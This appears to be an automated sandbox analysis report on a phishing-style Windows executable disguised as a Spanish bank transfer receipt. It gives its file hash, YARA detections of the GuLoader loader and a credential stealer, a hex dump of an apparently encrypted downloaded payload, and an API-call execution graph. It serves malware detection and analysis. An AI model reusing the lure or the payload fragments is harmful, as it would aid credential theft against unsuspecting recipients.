X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context
                                          Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                          Accept-Ranges: bytes
                                          Content-Length: 240192
                                          Last-Modified: Wed, 13 Mar 2024 08:04:39 GMT
                                          Date: Mon, 18 Mar 2024 14:06:45 GMT
                                          Expires: Mon, 18 Mar 2024 14:06:45 GMT
                                          Cache-Control: private, max-age=0
                                          X-Goog-Hash: crc32c=+37rCg==
                                          Server: UploadServer
                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                          Connection: close
                                          2024-03-18 14:06:45 UTC4687INData Raw: 78 7d 4c 71 49 8f 5d 50 02 02 4d cd f6 ff 7f 19 57 c1 c7 b6 1f 1e 2e 8d a8 7d e7 af 0a 77 89 fb 36 ba 67 5f 7a de 7e 11 7e 42 d9 db 56 f6 bc 29 fb ef 21 df db ec 3a 4b 86 5f bd dd a6 66 f4 c1 3c c4 0f ce 21 a9 13 84 de 30 e6 cc 42 94 fa e0 83 cf 3f 71 7d 9f 1d e7 5a 20 e2 58 26 8d cd 97 ad 56 c9 ee 3e db fc 4c e0 75 0e e3 b5 43 af e0 b6 6a 85 d2 a2 79 5e 2a e5 96 a9 6f d5 c0 d2 46 59 e5 83 7b 42 17 76 0a 05 d8 52 82 1f df 51 73 8b a2 ad 0e 8c d8 da 95 78 82 e5 57 31 c2 b3 83 9c 89 2e 37 30 d1 82 88 f6 95 12 e6 0e 2f 9e 6b 7e bf eb 8d ea 45 8c d7 f6 71 88 b2 ea 28 17 ad cb ee f3 a3 b4 95 f8 3c 4e 9b c3 ed b1 21 f4 d7 5f 72 5e 7f cb 82 c2 80 b5 89 9a 89 b7 d5 1d 44 09 45 23 bd eb e1 68 6c 5d e2 a9 13 1e 75 49 84 0e fa 69 03 dd f4 f5 b5 7a d4 78 73 26 88 f7
                                          Data Ascii: x}LqI]PMW.}w6g_z~~BV)!:K_f<!0B?q}Z X&V>LuCjy^*oFY{BvRQsxW1.70/k~Eq(<N!_r^DE#hl]uIizxs&
                                          2024-03-18 14:06:45 UTC4687INData Raw: 7e 0f 56 6f 4c a9 34 fe 1a 4b 56 22 de 74 74 65 99 a5 96 76 f7 ec 39 00 9c b5 66 f3 09 c8 4b c6 87 c9 ae 7c 4d b6 ce 7f 1a e8 ce 4e 2e 65 ca 12 ce b7 24 9a 1e b6 4d 5d 05 09 6e 77 7d 9b ae 8d 5e 87 bc 1d d8 6d d0 05 5b 34 57 8d 22 f7 fa b4 47 5b 17 d7 cd 7e 9b ff b0 5b e8 80 a6 47 ec d1 4e 0f 61 18 82 f9 7e 16 f8 3e 84 a9 ce 43 d3 61 d5 d0 26 8a 86 97 4d f4 9f 09 06 11 68 73 17 45 c7 f3 01 b2 ad 59 ea 9d 13 27 43 d5 4a b0 2e d6 5d d5 71 af 0d e0 ea dd 8b 43 cd 34 98 05 b3 c0 6e a4 cf 7a 27 93 87 99 1c b1 46 e8 98 66 a6 a9 d6 38 3f 42 fb ab f8 b3 64 d9 a3 05 d9 de 9c 04 82 e9 23 67 21 ff d4 aa cb 3c f8 02 34 71 bd de 7b 10 97 73 e1 20 90 ea 9d 17 da ef 82 d6 62 de 44 8a c5 3f b5 08 93 78 bc b1 d7 c2 c6 90 fa fb 9b 75 ad d1 01 ed be a8 c3 ce 4c b1 6f 91 40
                                          Data Ascii: ~VoL4KV"ttev9fK|MN.e$M]nw}^m[4W"G[~[GNa~>Ca&MhsEY'CJ.]qC4nz'Ff8?Bd#g!<4q{s bD?xuLo@
                                          2024-03-18 14:06:45 UTC1959INData Raw: 5c 93 2e 1a d3 57 d1 b0 59 c7 f4 ef 51 19 b0 cf 96 5c 37 85 50 44 a8 c5 24 57 f7 63 84 ee 51 fe 4e 57 4d a8 18 d5 f1 e0 e7 30 6d 02 75 da fd 88 73 7b 67 d9 bd 5c 51 25 fe 20 91 39 ac b0 f9 33 9a f7 4f 38 a9 aa 97 85 f0 cc ef a8 c6 62 42 e0 f6 70 7b 96 a9 dc ea 04 40 23 45 68 ab ab a6 6d e6 66 ff fd ad 0b 23 b0 34 14 87 94 a3 ba 92 0d a7 5c 75 6e 1a 3d 45 de 62 ee 1b b9 09 ae 20 56 ff d0 0e 02 c2 95 79 84 2f ea 22 fc 30 f8 ef f1 1e be 88 6f 47 cb 45 0b 8e 84 2b 56 48 25 86 50 e8 62 a8 9d a2 11 89 83 0b 52 50 af 02 5f 54 75 b7 0a f9 a3 f0 c3 1e 12 50 33 dc 2f 9d 2e 81 75 27 db 7e b5 43 eb 6b 57 1a f1 f2 55 8f a7 05 4b 22 a1 3b fc 04 55 0d 1c 68 82 f6 b7 1a 2d 96 ee 99 75 a8 1a 9b de 02 a1 8d 31 da ea 89 c9 e4 5e 35 18 05 2f 4e d5 bb a0 28 73 47 8e 4e 51 8e
                                          Data Ascii: \.WYQ\7PD$WcQNWM0mus{g\Q% 93O8bBp{@#Ehmf#4\un=Eb Vy/"0oGE+VH%PbRP_TuP3/.u'~CkWUK";Uh-u1^5/N(sGNQ
                                          2024-03-18 14:06:45 UTC1252INData Raw: 36 f0 76 63 41 bf 77 0c 8e 86 d5 a6 4b 1c a8 54 e8 62 90 26 52 ed 76 a3 fd 5e 53 af dc 55 58 75 b7 0a f4 96 d3 e3 06 12 ae 3a 22 2e d8 6d 81 75 23 db 7e b3 43 c5 6f 56 1a d8 d8 69 8f 8c f1 6d 1f a1 1b f3 fa 5b 0d e2 46 98 f6 b7 e4 df 9b e2 b9 77 56 16 97 20 23 8e 9c 31 da 14 76 fc c4 5e cb 16 fa 23 6a d6 6b e5 28 8d 48 a5 72 51 70 96 7c 54 2e 40 3b 43 0c 8e 10 fa ca 9d 9d 3d 87 cf 5d 03 78 42 c4 4f 73 0e 6b ed 7b d2 8f 33 f2 14 08 eb 9f c0 29 a1 a6 d9 34 54 ba b1 b4 a6 b3 00 ea 14 53 69 a7 a6 5f 82 f0 3c 9a eb 07 aa 82 e2 48 3f c1 b2 c1 40 2e 74 d7 3f f2 47 83 39 94 f0 51 c7 12 80 9d dd 98 e4 e3 6a 8f f2 28 71 b3 74 60 f7 27 73 e0 b1 cb 02 88 3e e0 9b c1 a4 5e 63 bf 9a ab 15 21 08 51 df 6a f1 1c 87 87 2d 79 ff 65 0f 4d 3f f8 3f 9d e1 82 93 47 ed 51 70 d6
                                          Data Ascii: 6vcAwKTb&Rv^SUXu:".mu#~CoVim[FwV #1v^#jk(HrQp|T.@;C=]xBOsk{3)4TSi_<H?@.t?G9Qj(qt`'s>^c!Qj-yeM??GQp
                                          2024-03-18 14:06:45 UTC1252INData Raw: 86 13 a5 cb c3 76 f2 49 a7 fd b3 5f a1 96 3a c8 41 9b 9a 74 3f f9 94 33 29 29 b0 8c f4 29 ad 89 17 cc c3 9c 73 78 ec 9b a5 42 b6 51 7c fd 58 80 90 d7 5c aa 78 bc 97 e9 90 09 29 5a e5 c4 e2 98 54 52 98 a6 33 9c 79 46 51 4b 23 58 33 62 9b 01 96 d8 b5 46 2f 58 b6 03 b2 7d f5 c8 96 42 b9 68 11 f4 78 ba 47 e0 b0 21 ca 69 eb 28 1f 12 8d ed 22 57 53 1a 46 13 37 99 eb cb c2 4c 9b ff 5d 49 bc f5 40 11 b9 6e ed d5 7e 3e ef 16 2e d8 66 0b 26 16 f2 a1 69 22 ea 87 48 28 8f 4a 0c 3d 85 04 1e 95 a0 c7 b0 39 60 8c de dc 98 ef 1a e5 24 b4 89 d8 0d 8a 92 b7 9c f9 71 9e bf cc 22 a9 13 7a d4 33 e6 cc 43 67 f9 e0 1b cf 3f 71 7d 61 1c de 10 20 e2 58 26 ad cc 97 ad 56 37 e0 3d db fc b2 ec 76 0e c3 b6 43 af e0 48 6b bc d7 a2 79 5e 12 e0 96 a9 6f 6d 48 2d b9 a8 d2 69 75 42 a9 10
                                          Data Ascii: vI_:At?3)))sxBQ|X\x)ZTR3yFQK#X3bF/X}BhxG!i("WSF7L]I@n~>.f&i"H(J=9`$q"z3Cg?q}a X&V7=vCHky^omH-iuB
                                          2024-03-18 14:06:45 UTC1252INData Raw: 8d 26 f7 fa b4 47 5b 17 d7 cd 7e 9b ff b0 5b ef 80 a6 47 ec d1 4e 16 61 18 82 87 51 17 f8 3a bd 34 c0 43 d3 41 23 dc 26 8a 58 9d 4d f4 9f 09 0b 28 6d 53 1f 45 ff f6 ff b3 94 72 b8 62 ec ab 3a d5 4a b6 b5 e5 5f d5 95 8f 04 e0 e6 dd 75 5c ed 34 98 fb bf 3e 60 86 cf 42 a6 93 79 98 25 45 4a ea 98 46 84 a8 d6 38 c1 bd cc b9 f8 b3 9a f5 a3 05 f9 d4 62 0a 82 17 02 5d 24 ff d4 54 fd 3b f8 02 ca 45 2a 20 a4 ee bd 73 e1 cd a1 d5 81 44 db ef 7c dd 62 de 2e de c5 3f b1 20 31 76 b8 bb d5 77 c7 90 fa db 67 79 a9 d1 df e1 bc a8 c3 ce 41 8a ee b1 40 fb 72 e5 28 48 cf 41 d3 a5 d4 03 0b af d5 6c 42 4a 40 c2 89 a1 d3 18 38 1c 5e 8e ec 3c b3 fc 55 7f 4c a6 9d 74 b6 8e 3b ed 33 22 f4 d9 27 30 90 6a 39 84 e9 a7 2b 3f ac ac c4 23 cc 4e 9f d3 4d d9 04 18 11 f8 ce b2 ba e6 54 3c
                                          Data Ascii: &G[~[GNaQ:4CA#&XM(mSErb:J_u\4>`By%EJF8b]$T;E* sD|b.? 1vwgyA@r(HAlBJ@8^<ULt;3"'0j9+?#NMT<
                                          2024-03-18 14:06:45 UTC1252INData Raw: 95 ef 5c 02 78 42 2b 61 70 0e 6b 13 89 df 8f 13 cc 87 1a eb 61 c1 ee a8 a6 d9 14 58 bf b1 b4 58 8a cf 36 eb ac 43 59 af 5f 91 e5 44 ee f2 06 ae f0 e5 4c 3f a0 ba da 40 2e 7e 54 45 f1 47 bf 1c a0 f0 51 c7 12 82 9e dd b8 1e ef 6a 8f 2c 3f 48 90 74 9e f6 e0 58 e0 b1 b7 98 81 3e e4 40 b6 d2 5e 9d b7 e9 8f 39 22 78 79 ef 94 ff 16 fa d3 28 79 fb 45 e6 43 3c f8 c1 6d ed 81 93 99 e2 51 70 f6 80 41 55 4c 06 80 02 9a e2 d7 1d 78 03 e2 03 10 ca 07 ae f3 e0 29 22 a7 04 bb 81 a8 13 ab 71 65 20 38 d3 78 49 44 05 70 10 c1 b3 49 0e 82 7f b7 17 2f 63 2e 05 98 37 7a 7e af 80 f9 df c5 a8 d7 f0 9b ba dd 9a f5 1c 89 cb bc 24 10 70 e9 ec 21 a4 b2 37 fd 64 90 5b 18 b5 45 f9 ae 30 dc 75 33 bb 8f 9c 69 04 74 02 a7 ed 29 e6 6c 7e a3 0f 59 72 ad 4e 25 20 ef ef 9e aa ce bf e8 e2 c7
                                          Data Ascii: \xB+apkaXX6CY_DL?@.~TEGQj,?HtX>@^9"xy(yEC<mQpAULx)"qe 8xIDpI/c.7z~$p!7d[E0u3it)l~YrN%
                                          2024-03-18 14:06:45 UTC1252INData Raw: 5d 49 42 f4 87 3f ba 6e cd 29 77 3e ef cd 54 95 68 0b 22 64 52 78 69 52 c2 bc 4b 28 85 37 86 33 86 00 3e 60 ac c4 b0 e7 6f 8c de dc 98 e2 23 f7 04 91 89 f8 0d 74 93 8e 40 f7 71 9e 61 c7 22 a9 36 ff ae 30 e6 c8 cf c1 fe e0 4b e7 24 71 7d 95 60 93 1a 20 e6 78 00 8d cd 97 53 58 c9 ee 3e 25 f0 4c e0 55 14 e3 b5 43 51 e1 8f 60 85 d2 a2 53 7e 31 e5 96 a9 91 5b c0 d2 46 a9 f6 39 75 62 a1 7f c7 24 9e 52 f7 c0 fe 05 1b 1c d8 8d 7e d6 fa bd e7 1f cf c6 34 50 ac 23 e2 e8 a9 4c ac 1c a3 f7 c6 c9 fc 7c c6 b4 61 f4 69 13 d0 8f 16 cd 48 81 f8 a9 05 88 b2 ee 5a a1 a9 9b db db b8 f8 94 f1 41 20 55 26 8c 91 01 f4 d7 5f 8c 50 7f 2b 82 3e 8d be 88 b1 f9 b7 75 1e ba 08 74 29 bd eb e1 42 4c 02 5d aa 13 e0 5b 49 84 0e c4 66 03 dd d4 89 b5 7a f4 86 72 1f 9d f7 bc a3 01 78 88 39
                                          Data Ascii: ]IB?n)w>Th"dRxiRK(73>`o#t@qa"60K$q}` xSX>%LUCQ`S~1[F9ub$R~4P#L|aiHZA U&_P+>ut)BL][Ifzrx9
                                          2024-03-18 14:06:45 UTC1252INData Raw: 39 fc 22 3c 49 28 20 7a e1 bd 73 e1 cd ac ec 9d 64 87 ef 82 d4 9c df 6c a0 c5 3f b5 22 4d 2b b8 b1 ef 03 c9 90 fa fb 9b 75 a9 d1 01 be be a8 c3 ce 4c b1 f9 91 40 fb 8c ec d7 49 d6 3c d3 a5 d4 43 93 54 2a 93 62 e6 4e c0 89 5f 23 14 3a 1c 80 81 ec 3c 93 6d 54 46 49 58 9c 4d a1 8b 3b ed cd 13 8e 26 fd b4 1a 63 39 80 6c db 2b 3f 56 80 3b 2d e5 01 61 de 4b b6 4f 45 11 f2 ec 57 b3 e6 5e 3a 01 01 6b cf 35 67 18 51 a8 df 42 8d 29 52 b3 65 d5 b1 f4 2d 5d 26 e0 a3 aa 81 c0 25 17 57 3e 35 11 81 c7 c6 f5 c6 3a a2 db 94 48 2c ec c0 e5 84 60 05 ce 42 c7 ef ed 5a 0c 59 41 d3 62 26 64 b6 60 db 36 03 b6 91 bc b3 0d 66 cc 27 7d 19 39 2a 56 e3 6e 26 9e 41 c8 be 33 94 ce ff a0 a1 b1 f9 4d 05 c8 43 c8 9d 31 53 14 87 eb 62 26 ae 56 f0 81 2d dc 6a c7 38 1f 26 a4 7e 5d 16 37 75
                                          Data Ascii: 9"<I( zsdl?"M+uL@I<CT*bN_#:<mTFIXM;&c9l+?V;-aKOEW^:k5gQB)Re-]&%W>5:H,`BZYAb&d`6f'}9*Vn&A3MC1Sb&V-j8&~]7u
                                          2024-03-18 14:06:45 UTC1252INData Raw: 51 70 d6 30 4f 55 4c f8 7f 37 8d e2 f7 0a 86 0a e3 fd 31 85 0d ae f3 a0 66 0b bf 04 9b ce 56 1d ab 8f 6b de 34 d3 86 65 7c 05 50 32 3f b2 70 fa 83 46 95 3d 0f 5a d0 0c 98 c9 51 05 db 80 07 d7 b7 92 f3 93 eb 92 c6 64 f4 2f 95 bf bc 24 ea 59 ca ec 09 e2 4c 39 fb 9a 99 a5 14 9d 00 d9 e2 36 fc 75 cd ba b6 40 68 5b 8a f5 af ed 09 d1 17 0a a3 f1 5c 20 fd 4a 25 50 39 f5 c1 54 cd c3 9c c2 63 18 18 84 ca 91 bb 4a 5f 1d b3 44 db 38 f1 e2 2c ca 30 b0 a5 e4 42 d1 04 7e 84 55 47 f7 0f 60 aa 1c 7d 9f 4e e0 d6 be 67 b4 a6 86 d5 84 72 9d 7b e3 73 88 d6 27 b8 06 ea 87 6a b6 ae b0 c5 21 28 f3 d4 cb 8c a6 91 fa f1 91 b4 89 0a ee c2 91 e7 70 7f a5 1c 2b ce 73 ad 25 b9 ca aa d2 b5 a9 44 40 b3 d7 8d f6 21 72 57 c3 f1 31 d1 0f fe 79 9b 47 a9 60 70 25 f7 b5 18 54 6b bc 99 cb 47
                                          Data Ascii: Qp0OUL71fVk4e|P2?pF=ZQd/$YL96u@h[\ J%P9TcJ_D8,0B~UG`}Ngr{s'j!(p+s%D@!rW1yG`p%TkG


                                          Click to jump to process

                                          Click to jump to process

                                          Click to dive into process behavior distribution

                                          Click to jump to process

                                          Target ID:0
                                          Start time:15:06:12
                                          Start date:18/03/2024
                                          Path:C:\Users\user\Desktop\comprobante de transferencia.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\Desktop\comprobante de transferencia.exe
                                          Imagebase:0x400000
                                          File size:800'824 bytes
                                          MD5 hash:8A1422827315B9DB63CD6B399A454FAB
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2920518142.0000000005056000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          Target ID:2
                                          Start time:15:06:33
                                          Start date:18/03/2024
                                          Path:C:\Users\user\Desktop\comprobante de transferencia.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\Desktop\comprobante de transferencia.exe
                                          Imagebase:0x400000
                                          File size:800'824 bytes
                                          MD5 hash:8A1422827315B9DB63CD6B399A454FAB
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.7701035769.0000000034211000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:false

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:20.9%
                                            Dynamic/Decrypted Code Coverage:13.7%
                                            Signature Coverage:20%
                                            Total number of Nodes:1542
                                            Total number of Limit Nodes:44
                                            execution_graph 5093 10001000 5096 1000101b 5093->5096 5103 10001516 5096->5103 5098 10001020 5099 10001024 5098->5099 5100 10001027 GlobalAlloc 5098->5100 5101 1000153d 3 API calls 5099->5101 5100->5099 5102 10001019 5101->5102 5105 1000151c 5103->5105 5104 10001522 5104->5098 5105->5104 5106 1000152e GlobalFree 5105->5106 5106->5098 5107 402840 5108 402bbf 18 API calls 5107->5108 5110 40284e 5108->5110 5109 402864 5112 405bca 2 API calls 5109->5112 5110->5109 5111 402bbf 18 API calls 5110->5111 5111->5109 5113 40286a 5112->5113 5135 405bef GetFileAttributesW CreateFileW 5113->5135 5115 402877 5116 402883 GlobalAlloc 5115->5116 5117 40291a 5115->5117 5120 402911 CloseHandle 5116->5120 5121 40289c 5116->5121 5118 402922 DeleteFileW 5117->5118 5119 402935 5117->5119 5118->5119 5120->5117 5136 403222 SetFilePointer 5121->5136 5123 4028a2 5124 40320c ReadFile 5123->5124 5125 4028ab GlobalAlloc 5124->5125 5126 4028bb 5125->5126 5127 4028ef 5125->5127 5128 403027 36 API calls 5126->5128 5129 405ca1 WriteFile 5127->5129 5134 4028c8 5128->5134 5130 4028fb GlobalFree 5129->5130 5131 403027 36 API calls 5130->5131 5132 40290e 5131->5132 5132->5120 5133 4028e6 GlobalFree 5133->5127 5134->5133 5135->5115 5136->5123 5137 401cc0 5138 402ba2 18 API calls 5137->5138 5139 401cc7 5138->5139 5140 402ba2 18 API calls 5139->5140 5141 401ccf GetDlgItem 5140->5141 5142 402531 5141->5142 5143 4029c0 5144 402ba2 18 API calls 5143->5144 5145 4029c6 5144->5145 5146 4029d4 5145->5146 5147 4029f9 5145->5147 5149 40281e 5145->5149 5146->5149 5151 405f61 wsprintfW 5146->5151 5148 40603c 18 API calls 5147->5148 5147->5149 5148->5149 5151->5149 4003 401fc3 4004 401fd5 4003->4004 4005 402087 4003->4005 4026 402bbf 4004->4026 4007 401423 25 API calls 4005->4007 4014 4021e1 4007->4014 4009 402bbf 18 API calls 4010 401fe5 4009->4010 4011 401ffb LoadLibraryExW 4010->4011 4012 401fed GetModuleHandleW 4010->4012 4011->4005 4013 40200c 4011->4013 4012->4011 4012->4013 4032 406463 WideCharToMultiByte 4013->4032 4017 402056 4080 405179 4017->4080 4018 40201d 4019 402025 4018->4019 4020 40203c 4018->4020 4077 401423 4019->4077 4035 10001759 4020->4035 4023 40202d 4023->4014 4024 402079 FreeLibrary 4023->4024 4024->4014 4027 402bcb 4026->4027 4091 40603c 4027->4091 4030 401fdc 4030->4009 4033 40648d GetProcAddress 4032->4033 4034 402017 4032->4034 4033->4034 4034->4017 4034->4018 4036 10001789 4035->4036 4130 10001b18 4036->4130 4038 10001790 4039 100018a6 4038->4039 4040 100017a1 4038->4040 4041 100017a8 4038->4041 4039->4023 4179 10002286 4040->4179 4162 100022d0 4041->4162 4046 1000180c 4050 10001812 4046->4050 4051 1000184e 4046->4051 4047 100017ee 4192 100024a9 4047->4192 4048 100017d7 4060 100017cd 4048->4060 4189 10002b5f 4048->4189 4049 100017be 4053 100017c4 4049->4053 4058 100017cf 4049->4058 4054 100015b4 3 API calls 4050->4054 4056 100024a9 10 API calls 4051->4056 4053->4060 4173 100028a4 4053->4173 4062 10001828 4054->4062 4067 10001840 4056->4067 4057 100017f4 4203 100015b4 4057->4203 4183 10002645 4058->4183 4060->4046 4060->4047 4065 100024a9 10 API calls 4062->4065 4064 100017d5 4064->4060 4065->4067 4068 10001895 4067->4068 4214 1000246c 4067->4214 4068->4039 4071 1000189f GlobalFree 4068->4071 4071->4039 4074 10001881 4074->4068 4218 1000153d wsprintfW 4074->4218 4075 1000187a FreeLibrary 4075->4074 4078 405179 25 API calls 4077->4078 4079 401431 4078->4079 4079->4023 4081 405194 4080->4081 4090 405236 4080->4090 4082 4051b0 lstrlenW 4081->4082 4083 40603c 18 API calls 4081->4083 4084 4051d9 4082->4084 4085 4051be lstrlenW 4082->4085 4083->4082 4087 4051ec 4084->4087 4088 4051df SetWindowTextW 4084->4088 4086 4051d0 lstrcatW 4085->4086 4085->4090 4086->4084 4089 4051f2 SendMessageW SendMessageW SendMessageW 4087->4089 4087->4090 4088->4087 4089->4090 4090->4023 4092 406049 4091->4092 4093 406294 4092->4093 4096 4060fc GetVersion 4092->4096 4097 406262 lstrlenW 4092->4097 4099 40603c 10 API calls 4092->4099 4102 406177 GetSystemDirectoryW 4092->4102 4103 40618a GetWindowsDirectoryW 4092->4103 4104 4062ae 5 API calls 4092->4104 4105 40603c 10 API calls 4092->4105 4106 406203 lstrcatW 4092->4106 4107 4061be SHGetSpecialFolderLocation 4092->4107 4118 405ee7 RegOpenKeyExW 4092->4118 4123 405f61 wsprintfW 4092->4123 4124 40601a lstrcpynW 4092->4124 4094 402bec 4093->4094 4125 40601a lstrcpynW 4093->4125 4094->4030 4109 4062ae 4094->4109 4096->4092 4097->4092 4099->4097 4102->4092 4103->4092 4104->4092 4105->4092 4106->4092 4107->4092 4108 4061d6 SHGetPathFromIDListW CoTaskMemFree 4107->4108 4108->4092 4116 4062bb 4109->4116 4110 406331 4111 406336 CharPrevW 4110->4111 4114 406357 4110->4114 4111->4110 4112 406324 CharNextW 4112->4110 4112->4116 4114->4030 4115 406310 CharNextW 4115->4116 4116->4110 4116->4112 4116->4115 4117 40631f CharNextW 4116->4117 4126 4059fb 4116->4126 4117->4112 4119 405f5b 4118->4119 4120 405f1b RegQueryValueExW 4118->4120 4119->4092 4121 405f3c RegCloseKey 4120->4121 4121->4119 4123->4092 4124->4092 4125->4094 4127 405a01 4126->4127 4128 405a17 4127->4128 4129 405a08 CharNextW 4127->4129 4128->4116 4129->4127 4221 1000121b GlobalAlloc 4130->4221 4132 10001b3c 4222 1000121b GlobalAlloc 4132->4222 4134 10001d7a GlobalFree GlobalFree GlobalFree 4135 10001d97 4134->4135 4153 10001de1 4134->4153 4136 100020ee 4135->4136 4144 10001dac 4135->4144 4135->4153 4138 10002110 GetModuleHandleW 4136->4138 4136->4153 4137 10001c1d GlobalAlloc 4158 10001b47 4137->4158 4139 10002121 LoadLibraryW 4138->4139 4140 10002136 4138->4140 4139->4140 4139->4153 4229 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4140->4229 4141 10001c68 lstrcpyW 4145 10001c72 lstrcpyW 4141->4145 4142 10001c86 GlobalFree 4142->4158 4144->4153 4225 1000122c 4144->4225 4145->4158 4146 10002188 4147 10002195 lstrlenW 4146->4147 4146->4153 4230 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4147->4230 4149 10002148 4149->4146 4161 10002172 GetProcAddress 4149->4161 4150 10002048 4150->4153 4154 10002090 lstrcpyW 4150->4154 4153->4038 4154->4153 4155 10001cc4 4155->4158 4223 1000158f GlobalSize GlobalAlloc 4155->4223 4156 10001f37 GlobalFree 4156->4158 4157 100021af 4157->4153 4158->4134 4158->4137 4158->4141 4158->4142 4158->4145 4158->4150 4158->4153 4158->4155 4158->4156 4160 1000122c 2 API calls 4158->4160 4228 1000121b GlobalAlloc 4158->4228 4160->4158 4161->4146 4164 100022e8 4162->4164 4163 1000122c GlobalAlloc lstrcpynW 4163->4164 4164->4163 4166 10002415 GlobalFree 4164->4166 4168 100023d3 lstrlenW 4164->4168 4169 100023ba GlobalAlloc CLSIDFromString 4164->4169 4170 1000238f GlobalAlloc WideCharToMultiByte 4164->4170 4232 100012ba 4164->4232 4166->4164 4167 100017ae 4166->4167 4167->4048 4167->4049 4167->4060 4168->4166 4172 100023de 4168->4172 4169->4166 4170->4166 4172->4166 4236 100025d9 4172->4236 4174 100028b6 4173->4174 4175 1000295b VirtualAlloc 4174->4175 4176 10002979 4175->4176 4177 10002a75 4176->4177 4178 10002a6a GetLastError 4176->4178 4177->4060 4178->4177 4180 10002296 4179->4180 4181 100017a7 4179->4181 4180->4181 4182 100022a8 GlobalAlloc 4180->4182 4181->4041 4182->4180 4187 10002661 4183->4187 4184 100026b2 GlobalAlloc 4188 100026d4 4184->4188 4185 100026c5 4186 100026ca GlobalSize 4185->4186 4185->4188 4186->4188 4187->4184 4187->4185 4188->4064 4190 10002b6a 4189->4190 4191 10002baa GlobalFree 4190->4191 4239 1000121b GlobalAlloc 4192->4239 4194 10002530 StringFromGUID2 4201 100024b3 4194->4201 4195 10002541 lstrcpynW 4195->4201 4196 1000250b MultiByteToWideChar 4196->4201 4197 10002554 wsprintfW 4197->4201 4198 10002571 GlobalFree 4198->4201 4199 100025ac GlobalFree 4199->4057 4200 10001272 2 API calls 4200->4201 4201->4194 4201->4195 4201->4196 4201->4197 4201->4198 4201->4199 4201->4200 4240 100012e1 4201->4240 4244 1000121b GlobalAlloc 4203->4244 4205 100015ba 4206 100015c7 lstrcpyW 4205->4206 4208 100015e1 4205->4208 4209 100015fb 4206->4209 4208->4209 4210 100015e6 wsprintfW 4208->4210 4211 10001272 4209->4211 4210->4209 4212 100012b5 GlobalFree 4211->4212 4213 1000127b GlobalAlloc lstrcpynW 4211->4213 4212->4067 4213->4212 4215 1000247a 4214->4215 4216 10001861 4214->4216 4215->4216 4217 10002496 GlobalFree 4215->4217 4216->4074 4216->4075 4217->4215 4219 10001272 2 API calls 4218->4219 4220 1000155e 4219->4220 4220->4068 4221->4132 4222->4158 4224 100015ad 4223->4224 4224->4155 4231 1000121b GlobalAlloc 4225->4231 4227 1000123b lstrcpynW 4227->4153 4228->4158 4229->4149 4230->4157 4231->4227 4233 100012c1 4232->4233 4234 1000122c 2 API calls 4233->4234 4235 100012df 4234->4235 4235->4164 4237 100025e7 VirtualAlloc 4236->4237 4238 1000263d 4236->4238 4237->4238 4238->4172 4239->4201 4241 100012ea 4240->4241 4242 1000130c 4240->4242 4241->4242 4243 100012f0 lstrcpyW 4241->4243 4242->4201 4243->4242 4244->4205 5152 4016c4 5153 402bbf 18 API calls 5152->5153 5154 4016ca GetFullPathNameW 5153->5154 5155 4016e4 5154->5155 5161 401706 5154->5161 5157 40635d 2 API calls 5155->5157 5155->5161 5156 40171b GetShortPathNameW 5158 402a4c 5156->5158 5159 4016f6 5157->5159 5159->5161 5162 40601a lstrcpynW 5159->5162 5161->5156 5161->5158 5162->5161 5173 40194e 5174 402bbf 18 API calls 5173->5174 5175 401955 lstrlenW 5174->5175 5176 402531 5175->5176 5177 4027ce 5178 4027d6 5177->5178 5179 4027da FindNextFileW 5178->5179 5182 4027ec 5178->5182 5180 402833 5179->5180 5179->5182 5183 40601a lstrcpynW 5180->5183 5183->5182 5184 4048cf 5185 4048fb 5184->5185 5186 4048df 5184->5186 5187 404901 SHGetPathFromIDListW 5185->5187 5188 40492e 5185->5188 5195 405743 GetDlgItemTextW 5186->5195 5190 404911 5187->5190 5191 404918 SendMessageW 5187->5191 5193 40140b 2 API calls 5190->5193 5191->5188 5192 4048ec SendMessageW 5192->5185 5193->5191 5195->5192 4914 401754 4915 402bbf 18 API calls 4914->4915 4916 40175b 4915->4916 4917 405c1e 2 API calls 4916->4917 4918 401762 4917->4918 4919 405c1e 2 API calls 4918->4919 4919->4918 5203 401d56 GetDC GetDeviceCaps 5204 402ba2 18 API calls 5203->5204 5205 401d74 MulDiv ReleaseDC 5204->5205 5206 402ba2 18 API calls 5205->5206 5207 401d93 5206->5207 5208 40603c 18 API calls 5207->5208 5209 401dcc CreateFontIndirectW 5208->5209 5210 402531 